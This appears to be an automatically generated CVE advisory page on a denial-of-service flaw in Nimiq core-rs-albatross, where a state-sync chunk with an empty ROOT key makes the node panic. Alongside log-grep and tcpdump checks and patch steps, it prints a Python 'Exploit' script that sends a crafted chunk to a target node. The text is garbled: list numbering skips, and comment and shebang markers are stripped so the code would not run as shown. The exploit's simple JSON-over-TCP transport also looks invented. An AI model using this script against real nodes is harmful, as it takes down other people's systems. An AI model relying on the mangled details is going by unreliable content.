Nimiq core-rs-albatross, Denial-of-Service (DoS), CVE-2026-46545 (High)

Listen to this Post

1. The vulnerability exists in the `MerkleRadixTrie::put_chunk` function.

  1. An unauthenticated remote attacker can send a malicious state-sync chunk.
  2. The chunk contains a `TrieItem` with an empty (ROOT) key.
  3. This chunk passes sorting, range, and Merkle-proof validation.
  4. When processed, `put_raw` attempts to store a value at the root node.

6. `TrieNode::put_value` is called, which returns `Err(RootCantHaveValue)`.

  1. The code uses `.unwrap()` on the result, causing a panic.
  2. The panic aborts the node process (denial of service).
  3. The attack works on nodes performing state synchronization.

10. Fresh nodes joining the network are vulnerable.

  1. Existing nodes recovering from data loss are also vulnerable.
  2. There is no rate limit or authentication to prevent the attack.
  3. The malicious peer only needs to respond to a RequestChunk.
  4. The first malicious chunk committed triggers the crash.

15. Honest nodes never construct ROOT-keyed items.

16. Therefore, non-syncing operations are unaffected.

17. The affected code is in `primitives/trie/src/trie.rs`.

18. `put_chunk` is around line 819, `put_raw` around line 351.
19. The vulnerability is fixed by rejecting ROOT-keyed items.
20. No in-process workaround exists; a patch is required.

DailyCVE form:

Platform: Nimiq core-rs-albatross
Version: before commit 0fb8766
Vulnerability: Denial-of-Service DoS
Severity: High
date: 2026-05-15

Prediction: patch date 2026-05-15

What Undercode Say:

Analytics:

Search for the panic in node logs
grep -E "RootCantHaveValue|panicked at 'called `Result::unwrap()` on an `Err` value" /var/log/nimiq/node.log
Monitor state-sync requests for anomalies
tcpdump -i eth0 -n 'tcp port 8080 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x52657175)' "Requ" in hex
Check if a node is running a vulnerable version
strings $(which nimiq-node) | grep -E "put_chunk.819|put_raw.351"

Exploit:

!/usr/bin/env python3
import socket
import json
Craft a malicious state-sync chunk with an empty ROOT key
malicious_chunk = {
"items": [{"key": "", "value": "malicious"}],
"end_key": None
}
Send to a vulnerable node's state-sync port (e.g., 8080)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("target.node.ip", 8080))
sock.send(json.dumps(malicious_chunk).encode())
sock.close()

Protection from this CVE:

Update to the patched version
cd core-rs-albatross && git pull && cargo build --release
Alternatively, apply the specific commit fix
git fetch origin pull/3762/head && git cherry-pick 0fb8766
Restart the node after updating
systemctl restart nimiq-node

Impact:

A single malicious chunk crashes any vulnerable node during state sync, enabling an unauthenticated attacker to repeatedly take down fresh or recovering nodes, disrupting network stability and preventing new nodes from joining.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top